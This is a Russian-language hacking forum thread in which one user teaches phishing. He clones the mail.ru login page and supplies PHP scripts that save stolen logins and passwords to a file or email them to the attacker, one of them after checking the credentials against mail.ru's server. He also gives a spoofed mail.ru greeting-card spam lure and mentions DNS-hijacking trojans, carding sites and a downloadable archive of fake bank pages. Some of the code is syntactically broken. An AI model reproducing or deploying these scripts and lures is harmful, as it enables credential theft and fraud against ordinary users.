-=Всё будет=-

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » -=Всё будет=- » Хакинг » Создание и использование скамов

Создание и использование скамов

Страница: 1

Сообщений 1 страница 6 из 6

1

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол:
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

здравствуйте. сегодня я хотел бы рассказать вам о таком виде интернет-мошенничества, как фишинг.

фишинг (англ. phishing, от password — пароль и fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, цель которого — получить идентификационные данные пользователей.

фишинг, в основном, основывается на создании фейковых сайтов или страниц, которые называются "скамы"

скамы (scam) - фейки сайтов,создаваемые с целью сбора вводимой информации,будь то идентификационные данные либо какая-то ценная информация. зачастую скамы играют на руку кардерам - нередки случаи создания липовых шопов.

создание скама зачастую сводится к изменению скрипта-обработчика таким образом,чтобы данные отсылались не на оригинальный сайт,а собирались в файле либо сразу отсылались на почту к злоумышленику. дизайн таких сайтов ничуть не отличается от их братьев-оригиналов и заподозрить неладное может только опытный пользователь или же сам проект вводит защиту от фишинга. например, firefox второй ветки и opera последних версии сравнивает сайт с черным списком и в случае обнаружения поддельного сайта извещает юзера, и не дает ввести данные. internet explorer также имеет защиту, но фильтр надо качать отдельно ( Зарегистрируйтесь, чтобы увидеть скрытый текстhttp://g.msn.com/8seenus020100/addinsph … ownloadurl )

размах создания подобных сайтов удивляет. исследовательская компания x-force зарегистрировала 114 тысяч фишинговых сайтов за неделю с 11 по 18 июля. согласно этой информации, 99,8% этих сайтов было создано с помощью средств автоматического фишинга. и только 0,2% не были подчинены общей стратегии для атаки.

итак, а теперь попробуем создать скам-страницу крупнейшего мэил-сервиса россии wwwmail.ru

рассмотрим главную страницу. для начала сохраним страницу на жесткий диск и посмотрим сурс. ищем скрипт, к которому обращается страница при логине.

<form name=auth method=post action="http://win.mail.ru/cgi-bin/auth">

0

2

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол:
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

видим название скрипта: cgi-bin/auth

теперь перейдем к созданию самого скрипта, который будет воровать пароли. их может быть 2 вида: первый отсылает данные на мыло, а второй сохраняет в файл. я покажу вам оба варианта.

скрипт сохранения в файл.

<?
$login = $http_post_vars['login'];
$domain = $http_post_vars['domain'];
$password = $http_post_vars['password'];           

$filename = "base.txt";
$file = fopen($filename, "a+" );
fputs ($file, 'login: '.$login."\n");
fputs ($file, 'domain: '.$domain."\n");
fputs ($file, 'password: '.$password."\n");                     
fclose($file);
?>

0

3

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол:
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

скрипт отправки на мыло

<?
$login = $http_post_vars['login'];
$domain = $http_post_vars['domain'];
$password = $http_post_vars['password'];           

$message .= "login: ".$login."\n"
$message .= "domain: ".$domain."\n"
$message .= "password: ".$password"\n";
{
mail("your_mail@mail.com", "new_mailru_acc", $message);
};
?>

0

4

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол:
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

содержание может варьироваться и совершенствоваться, например при неправильной паре логин/пароль человек получит не простую страницу, а вернется на главную и его попросят ввести правильные данные. попробуем написать подобный скрипт. в случае правильной пары, сервер вернет http/1.1 302 ok. если же нет, то юзера вернут на главную страницу, где его попросят ввести данные заного.

<?php
define ( _mail,"test@mail.ru");
define ( _subj,"new lox found!!!1");
if (isset($_post['login']) && isset($_post['domain'] & isset($_post['password']))
{
$fsock = fsockopen("win.mail.ru",80,$err,$errdesc,3);
$params   = "login=".$_post['login']."domain=".$_post['domain']."&password=".$_post['password'];
$request  = "post /cgi-bin/auth http/1.1\r\n";
$request .= "user-agent: mozilla/5.0 (windows; u; windows nt 5.1; ru; rv:1.8.1.4) gecko/20070515 firefox/2.0.0.4\r\n";
$request .= "accept-language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$request .= "referer: -
$request .= "content-type: application/x-www-form-urlencoded\r\n";
$request .= "host: win.mail.ru\r\n";
$request .= "content-length: ".strlen($params)."\r\n";
$request .= "connection: keep-alive\r\n\r\n";
$request .= $params;
fwrite($fsock,$request);
while (!feof($fsock))  $responce .= fgets($fsock,1024);
if (strpos($responce,"http/1.1 302 ok"))
{
  $msg = "new account : ".$_post['login']."@".$_post['domain']" : ".$_post['password'];
  mail (_mail,_subj,$msg,"from: billy@microsoft.com");
  $fd  = fopen("_signon.php","r");
  $log = fread($fd,filesize("_signon.php"));
  fclose($fd);
  echo $log;
}

if (strpos($responce,"неверное имя пользователя или пароль "))
{
  $responce = substr($responce,strpos($responce,"<"));
  print $responce;
}
}
?>

0

5

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол:
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

это обеспечивает большую вероятность того, что пользователь ничего не заподозрит, и решит-таки ввести верные данные.

итак, когда мы написали скрипт для кражи конфидицальной информации, попробуем разместить наш фейк и заманить на него пользователей.
хостинг подойдет любой, даже карженный, с поддержкой php. заливаем главную страницу (со всеми картинками и измененным адресом скрипта).
теперь, когда наш фейк в сети, мы можем начать нагонкой посетителей. можно нагонять по-разному: спамом, гнать трафф и прочее.

на примере mail.ru можно спамить открыткой. возьмем к примеру новогоднюю открытку
дорогие друзья!

мы поздравляем вас с наступлением самого удивительного и волшебного праздника - нового года и дарим нашу <a href="http://ваш_хост/">новогоднюю открытку</a>.

// или же так.

для получения открытки нажмите на эту ссылку: <a href="http://ваш_хост/">http://mail.ru/cgi-bin/get_card?card=7815696ecbf1c96e6894b779456d330e</a>

спасибо, что были с нами весь этот год, который принес столько интересных проектов:
# видео@mail.ru позволяет бесплатно хранить в сети видеофайлы, а также просматривать интересные ролики других пользователей;
# ответы@mail.ru помогают найти ответы на животрепещущие вопросы, поделиться знаниями и опытом;
# интернет-пейджер mail.ru агент обогатился множеством новых функций - из него можно бесплатно посылать sms, звонить на мобильные и городские номера по всему миру. последняя версия м-агента стала разноцветной, из нее можно отправлять друзьям забавные мультики и анимированные смайлы.

а фото@mail.ru до конца января предлагает вам уникальную возможность напечатать фотографии по цене всего 2.50 руб. за фото 10х15 с доставкой в любую точку россии!

мы любим вас и надеемся, что и в будущем году вы останетесь с нами. а чтобы ваши желания обязательно сбылись, отправьте их деду морозу! прямое почтовое сообщение с ним установлено на нашем новогоднем проекте 2007.mail.ru. счастливого вам нового года!

с наилучшими пожеланиями,
команда mail.ru

0

6

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол:
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

//стоит помнить, чтобы привлекать серьезных пользователей, нужно спамить не с простого пхп скрипта на вашем хосте, а с нормальной спам-системы типа dms. используйте подмену обратного адреса, соксы.

существует также способ привлечения пользователей с помощью троев. такие трои, как agentdq, nuclear grubber, snatch, limbo, имеют функцию перехвата резолва адреса с последующим редиректом на фейковую страницу. то есть получается, что пользователь пишет Зарегистрируйтесь, чтобы увидеть скрытый текстhttp://mail.ru, а попадает на http://ваш_хост/fakes/mail.html, к примеру.

в ie существуют уязвимости, с помощью которых возможно подменять адрес сайта в адресной строке броузера.

ссылки на несколько уязвимостей: Зарегистрируйтесь, чтобы увидеть скрытый текстhttp://www.securitylab.ru/vulnerability/275916.php | Зарегистрируйтесь, чтобы увидеть скрытый текстhttp://www.securitylab.ru/vulnerability/299569.php
но т.к данная уязвимость используется достаточно редко и имеет множество реализаций, подробно описывать ее не буду. кому будет нужно - существует море инфы по этому топику.

теперь поговорим о кардерской направленности. существует еще один вид фишинга. это создание полноценных, уникальных веб-сайтов. обычно эти сайты предлагают фейк-услуги, либо контент. владельцы этих скамов собирают с наивных американцев данные о их кредитных картах. для создания подобного сайта требуется (желательно) уникальный диз, движок, набор контента для привлечения.
и уже описанный выше вид - создание скамов известных банков, платежных систем.

архив качественных скамов известных банков. [5mb]
Зарегистрируйтесь, чтобы увидеть скрытый текстhttp://rapidshare.com/files/43084250/fakes.rar.html

0

Страница: 1

Вы здесь » -=Всё будет=- » Хакинг » Создание и использование скамов

Создать форум.